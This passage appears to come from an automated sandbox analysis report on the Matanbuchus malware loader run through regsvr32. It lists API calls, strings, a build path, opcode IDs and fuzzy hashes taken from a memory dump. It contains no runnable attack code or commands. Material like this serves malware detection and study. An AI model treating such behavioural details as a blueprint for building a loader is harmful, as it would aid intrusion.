                                                                    • Part of subcall function 7F15F6E7: GetTickCount.KERNEL32 ref: 7F15F705
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2937446106.000000007F100000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F100000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7f100000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseValue$CountCreateOpenTickwsprintf
                                                                  • String ID: %s_%x%x$SOFTWARE$bbb$kkk
                                                                  • API String ID: 730945307-550109914
                                                                  • Opcode ID: f4618a25352ea8e47d886a64a6cef05ee3b6bbf71647473c2e237d402df9170f
                                                                  • Instruction ID: 12bf78b3388bdf98afa14c7ebd5d44874fd925fcfe07553e4678b5ef529879ce
                                                                  • Opcode Fuzzy Hash: f4618a25352ea8e47d886a64a6cef05ee3b6bbf71647473c2e237d402df9170f
                                                                  • Instruction Fuzzy Hash: 91317C72A0021CBBDB229A95CD49FDFBF7DEF05760F100065F615E6050D731AAA4DBA0
                                                                  APIs
                                                                  • std::bad_exception::bad_exception.LIBCMTD ref: 7F153EFF
                                                                  • std::bad_exception::bad_exception.LIBCMTD ref: 7F153F19
                                                                  • std::bad_exception::bad_exception.LIBCMTD ref: 7F153F33
                                                                  • std::bad_exception::bad_exception.LIBCMTD ref: 7F153F4D
                                                                  Strings
                                                                  • B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp, xrefs: 7F153F69
                                                                  • false, xrefs: 7F153F6E
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2937446106.000000007F100000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F100000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7f100000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: std::bad_exception::bad_exception
                                                                  • String ID: B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$false
                                                                  • API String ID: 2160870905-4036550669
                                                                  • Opcode ID: 8033cf19a1a1b9fddd498e058d857b0b3486f0557d3325721afb1be27f59f445
                                                                  • Instruction ID: 974672ea6d112278abdb612dae3688432e566409813af6a1e66330fa09136d4a
                                                                  • Opcode Fuzzy Hash: 8033cf19a1a1b9fddd498e058d857b0b3486f0557d3325721afb1be27f59f445
                                                                  • Instruction Fuzzy Hash: 83212E71A00349EBCB08CFA4C890DDE77B6FB85710F188559F9116B244DF31BA399B65
                                                                  APIs
                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,99818FC4,7F1852A0,?,00000000,7F183C13,000000FF,?,7F17077A,7D83FC4D,?,7F17074E,7F1852A0), ref: 7F17081F
                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 7F170831
                                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,7F183C13,000000FF,?,7F17077A,7D83FC4D,?,7F17074E,7F1852A0), ref: 7F170853
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2937446106.000000007F100000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F100000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7f100000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                  • API String ID: 4061214504-1276376045
                                                                  • Opcode ID: 8bb12c9cada94264132c9fc708db4131292567ba704efc30f518ae11eb848e67
                                                                  • Instruction ID: ebab52ca12d0b7459da9bf90e594e87a53bfc35587d1d3c0c1ebe28be95dd918
                                                                  • Opcode Fuzzy Hash: 8bb12c9cada94264132c9fc708db4131292567ba704efc30f518ae11eb848e67
                                                                  • Instruction Fuzzy Hash: 20018F36910715AFDB028F52CD05BAEBBB8FB04731F140229FC16A6680DB759850CB90
                                                                  APIs
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 7F115807
                                                                  • int.LIBCPMTD ref: 7F115820
                                                                    • Part of subcall function 7F11AA20: std::_Lockit::_Lockit.LIBCPMT ref: 7F11AA36
                                                                    • Part of subcall function 7F11AA20: std::_Lockit::~_Lockit.LIBCPMT ref: 7F11AA60
                                                                  • Concurrency::cancel_current_task.LIBCPMTD ref: 7F115867
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 7F1158FB
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2937446106.000000007F100000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F100000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7f100000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                                                                  • String ID:
                                                                  • API String ID: 3053331623-0
                                                                  • Opcode ID: e7d38201fa2152f1ac05d02fb02bd15979c6607bcc5679be24a339ad3abe0aa4
                                                                  • Instruction ID: a19583f58240e99eba1e99b4a5d029491452c6edcf4da367705f0931c18d35d2
                                                                  • Opcode Fuzzy Hash: e7d38201fa2152f1ac05d02fb02bd15979c6607bcc5679be24a339ad3abe0aa4
                                                                  • Instruction Fuzzy Hash: AD41C5B4D00619DFCB04CF99D990AEEBBB1FF48314F204229E925A7390DB346A51CFA1
                                                                  APIs
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 7F1156C7
                                                                  • int.LIBCPMTD ref: 7F1156E0
                                                                    • Part of subcall function 7F11AA20: std::_Lockit::_Lockit.LIBCPMT ref: 7F11AA36
                                                                    • Part of subcall function 7F11AA20: std::_Lockit::~_Lockit.LIBCPMT ref: 7F11AA60
                                                                  • Concurrency::cancel_current_task.LIBCPMTD ref: 7F115727
                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 7F1157BB
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2937446106.000000007F100000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F100000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7f100000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                                                                  • String ID:
                                                                  • API String ID: 3053331623-0
                                                                  • Opcode ID: 6f10a47719ded0124ba9c706fa01d3fb06ea8fcb615797218b12cd5d4091b111
                                                                  • Instruction ID: 1b9b4e7e68d2177381a922e6d270cf10027a5e83d857784a8bdc46a6549e46f3
                                                                  • Opcode Fuzzy Hash: 6f10a47719ded0124ba9c706fa01d3fb06ea8fcb615797218b12cd5d4091b111
                                                                  • Instruction Fuzzy Hash: 5941A7B9D00609DFCB04CF98D591AEEBBB5FF48310F204669E825A7390D7346A55CFA1
                                                                  APIs
                                                                  • LoadLibraryExA.KERNEL32(advapi32,00000000,00000008), ref: 7F134841
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2937446106.000000007F100000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F100000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7f100000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID: MNo name attribute $advapi32$Operation
                                                                  • API String ID: 1029625771-688042845
                                                                  • Opcode ID: e84b2391516eb9429a7906e0d91b02d487cfe6de077f54c741ebdd92654869eb
                                                                  • Instruction ID: 21048e5f3b0cbfffd3fa9c7d163d1b0116c2a9d6e888c04cdcc3a9a574960aa3
                                                                  • Opcode Fuzzy Hash: e84b2391516eb9429a7906e0d91b02d487cfe6de077f54c741ebdd92654869eb
                                                                  • Instruction Fuzzy Hash: 4F91B6B5D081A88FDB15CF66CC907EDBBB5BF48324F5880EAE449B7644D2365AA0CF50
                                                                  APIs
                                                                  • LoadLibraryExW.KERNEL32(00000011,00000000,00000800,?,7F164F43,00000000,00000001,7F4655E4,?,?,?,7F1650E6,00000004,InitializeCriticalSectionEx,7F18AE34,InitializeCriticalSectionEx), ref: 7F164F9F
                                                                  • GetLastError.KERNEL32(?,7F164F43,00000000,00000001,7F4655E4,?,?,?,7F1650E6,00000004,InitializeCriticalSectionEx,7F18AE34,InitializeCriticalSectionEx,00000000,?,7F164E9D), ref: 7F164FA9
                                                                  • LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,7F163D43), ref: 7F164FD1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.2937446106.000000007F100000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F100000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_7f100000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LibraryLoad$ErrorLast
                                                                  • String ID: api-ms-
                                                                  • API String ID: 3177248105-2084034818
                                                                  • Opcode ID: ee8c53de39a34b57ebc5a553acdd833e6a1c2357bdea4af90770cab2dd4e5076
                                                                  • Instruction ID: e4e4e0f31d8b97ba3cbe297f311a4e1b145e08f4bed4a0998fbd98b279a4c9ba
                                                                  • Opcode Fuzzy Hash: ee8c53de39a34b57ebc5a553acdd833e6a1c2357bdea4af90770cab2dd4e5076
                                                                  • Instruction Fuzzy Hash: E1E01A36288304B7EB121AA1DD06B493F65AB10B71F248470F95EE8990EF62E5709B94